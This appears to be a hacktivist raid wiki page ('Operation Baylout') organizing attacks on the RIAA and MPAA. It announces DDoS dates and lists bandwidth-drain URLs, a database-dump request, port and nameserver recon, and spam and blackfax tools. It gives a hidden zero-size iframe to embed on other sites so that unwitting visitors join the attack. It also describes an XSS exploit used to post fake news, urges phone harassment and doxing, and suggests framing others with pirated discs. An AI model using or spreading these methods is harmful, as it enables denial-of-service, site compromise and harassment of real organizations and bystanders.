<div style='width: 300px; position: relative; float: right;'>
* See [[Operation Baylout]]
</div>

Frankly, we're all sick of the shit the MPAA and RIAA are pulling for anti-piracy, when the fact is they're making more money off of piracy than ever. It's utter bullshit and they're trying to abolish our net neutrality with shit like [http://anonym.to/http://en.wikipedia.org/wiki/Anti-Counterfeiting_Trade_Agreement ACTA].

= Information =

The [http://anonym.to/http://riaa.com RIAA] and [http://anonym.to/http://mpaa.org MPAA] have recently been pulling some shit in an attempt to "combat internet piracy"; however, their true intentions lie in the fact that they just want to make more money off of people buying music and movies and other forms of entertainment instead of getting them off of the internet completely free. Such actions could possibly lead to the abolishing of net neutrality, which makes the internet so unique and free, and one of their biggest weapons in this conflict is the [http://anonym.to/http://en.wikipedia.org/wiki/Anti-Counterfeiting_Trade_Agreement ACTA].  The ACTA is a trade agreement between most of the developed nations around the world which allows things like computers, phones, and music players (as well as the media-playing software inside these devices) to be checked at any international border for things like freely downloaded music and movies - and worst of all, they can do this completely without a warrant. If you are found to be in possession of any "pirated" materials, then you can be fined massive amounts of money and the device in question may be confiscated, or even destroyed (they will not pay for a new one). The ACTA also cooperates with internet service providers by having them monitor and report all of the activities of their customers - yet again, WITH NO WARRANT.  Associations like the RIAA and MPAA also have other plans to prevent piracy. Some of these plans include (but are in no way limited to) the following: 

* Fake download sites which redirect users to "legal download sites" which require money for downloads
* [http://anonym.to/http://www.theinquirer.net/en/inquirer/news/2003/05/05/riaa-mpaa--threaten-software-cluster-bombs "Software Cluster-Bombs"] which could be things as harmless as redirecting to "legal" sites to things as malicious as temporarily or even permanently blocking a user from their system
* Probably other Bill-Of-Rights-infringing ideas that Greedy Anglo-Saxon white men like them can think of.

-A friend in the gov't told me that the RIAA has ceased all individual lawsuits due to expense reasons as of 2 weeks ago.

= Targets =
On the First, Second and Third of November, We will be Ddosing RIAA.COM 


* '''RIAA'''
** RIAA.COM
* '''MPAA'''
** MPAA.ORG

* '''Current Target: '''
** RIAA.COM

== IRL ==

=== Phone ===

Call these numbers, etc. Try playing [http://anonym.to/http://www.youtube.com/watch?v=SnLB8wysMbY] on the phone (link is a YouTube vid. Good audio quality.). Also, for rickrolling over the phone try [http://anonym.to/http://rickroll.prankdialer.com/ this website], or use [http://anonym.to/http://www.skype.com/ skype] to say it yourself. For blackfaxing, try [http://anonym.to/http://www.utdallas.edu/~liebowit/intprop/OS 2006-12-12.pdf An Empirical Analysis into the effects of filesharing] [http://anonym.to/http://drop.io/cboxxha Black version of PDF file]

* '''RIAA'''
** 202.775.0101
** 305.444.3114
** 202.775.7253 (fax)
** [http://anonym.to/http://www.anonym.to/http://anonym.to/http://riaa.com/aboutus.php?content_selector=who_we_are_board Additional phone/fax lines]
* '''MPAA'''
** 651.452.7710
** [http://anonym.to/http://www.anonym.to/http://anonym.to/http://www.mpaa.org/AboutUsContactUs.asp Additional phone/fax lines]

=== Dox ===

* '''For dox on individual people, use the [[Template:Standardized Dox]].'''
* [http://anonym.to/http://www.mediafire.com/?mnuk5imfe5t RIAA Training Video/Letter]

== Contact Emails ==

== Tech ==

=== DDoS ===

The bad thing is that these are not hosted in RIAAs main server whose IP address is 76.74.24.14*3* not 2. But they are hosted nonetheless by the god damn RIAA.

* '''Raep Methods'''
**''[[DDOS#Bandwidth_Raep|Bandwidth Raep]]
*** [http://anonym.to/http://riaa.com/images/global_background1.jpg http://anonym.to/http://riaa.com/images/global_background1.jpg ]
*** http://anonym.to/http://76.74.24.142/11B73BDE-8844-E2F1-6101-910078084C36.mp3
*** http://anonym.to/http://76.74.24.142/C1006249-FA11-B97C-7939-2296330FA615.mp3
*** http://anonym.to/http://76.74.24.142/6446A535-8039-4672-9CCF-4082581CE31F.mp3
*** http://anonym.to/http://76.74.24.142/C581BB0F-5827-A9DB-FB83-939102CB0E46.mp3
*** http://anonym.to/http://76.74.24.142/027B5B36-27EB-E4AC-64DB-970853D18C98.mp3
*** http://anonym.to/http://76.74.24.142/AB302C7D-F108-889A-DEE6-CE0B6432E0D0.mp3
*** http://anonym.to/http://76.74.24.142/CB9EE85F-BE34-0F69-D6BF-6D3C4345278B.mp3



* '''Database Raep'''

Some clever anon worked out an exploit to force the RIAA website to dump its entire reccord database of Gold and Platinums, the link is [http://anonym.to/http://riaa.com/goldandplatinumdata.php?table=SEARCH_RESULTS&title=&artist=&label=&format=&category=&type=&awardDescription=&startMonth=1&startYear=0&endMonth=12&endYear=2009&sort=Date&sense=ASC&perPage=5000000000&go=Search here]

Alternatively, the strongest of us can do a superraep: [http://anonym.to/http://dnathe4th.porfusion.com/superdrain_me_captain.php here]

EDIT: RIAA has deactivated their record database! EPIC WIN!

RIAA Search Raep can be found [http://anonym.to/http://newzpage.googlepages.com/spam-riaa.htm here]

MPAA Search Raep can be found [http://anonym.to/http://newzpage.googlepages.com/spam.htm here]

MPAA Favourite Movie Spammer can be found [http://anonym.to/http://newzpage.googlepages.com/spam-favmov.htm here] - it will enter random e-mail addresses into their database, and send "Steal This Film" as the Favourite Movie.

Hybrid [http://anonym.to/http://partyvan.111mb.net/justice/graetjustice.html Hybrid]

=== Non DDoS / Specialized ===

* '''riaa.com'''
** Nameservers
*** NS43.DOMAINCONTROL.COM
*** NS44.DOMAINCONTROL.COM
** '''Ports'''
*** 25/tcp filtered smtp
*** 80/tcp open http Apache httpd 2.2.3 ((Red Hat))
*** 443/tcp filtered https



* '''mpaa.org'''
** Nameservers
*** NS2.WARE.NET
*** NS1.WARE.NET
** '''Ports'''
*** 25/tcp filtered smtp
*** 80/tcp open http Microsoft IIS webserver 6.0 (WUT)
*** 443/tcp filtered https
** Service Info: OS: Windows



mpaa.org is a domain controlled by two nameservers at ware.net. They are on different IP networks. Incoming mail for mpaa.org is handled by one mailserver at global.bigfish.com. mpaa.org has one IP record: http://anonym.to/http://www.robtex.com/dns/mpaa.org.html

=== Automatic Blackfax ===

Enter this website, and your computer will send OVER 9000 blackfaxes to MPAA in a couple of hours![http://anonym.to/http://anon9463.110mb.com/ http://anonym.to/http://anon9463.110mb.com] '''SEEMS TO BE OFFLINE >_<'''

You can use condoms if you're afraid to get V&amp;, Tor works fine.

If you're too much of a pussy to run this yourself you can embed it invisibly on other websites with:

: :: &lt;iframe src="http://anonym.to/http://newzpage.googlepages.com/blackfax.htm" width="0" height="0" frameborder="no"&gt;&lt;/iframe&gt;

And then post it EVERYWHERE! Digg it, spam it, eat it, anything!

=Trolling IRL=
# Go to any electronics store, and buy some blank cd's/dvd's with cash, do not use your fucking credit/debit card.
# Put lots of pirated music/movies on them.
# Return them back to the store, giving some bullshit excuse and give them completely false information, bonus points if you use the name/address/phone number of someone you hate.
# Watch as the next person who buys the cd's/dvd's now has free music/movies, and the blame is put on the electronics store.

= Propaganda =

* '''For Anon'''

* '''For General Public'''
** [http://anonym.to/http://rofl.wheresthebeef.co.uk/RIAA_Phone_Call.mp3 RIAA Phone Call]
** "Watermarking Technology"

: :: Spread this link everywhere:
:: http://anonym.to/http://newzpage.googlepages.com/mpaa.htm

: :: It uses an XSS exploit on MPAA.org to show our made-up news about some new "Watermarking Technology" to track down pirates.
:: This is guaranteed to make MPAA very unpopular!

: :: You can help by spamming everyone you know and/or [http://anonym.to/http://digg.com/tech_news/New_Watermarking_Technology_to_Stop_Piracy Digg It]

: :: Stumbled

[[Category:Enemies]]{{enemies}}
[[Category:Project Baylout]]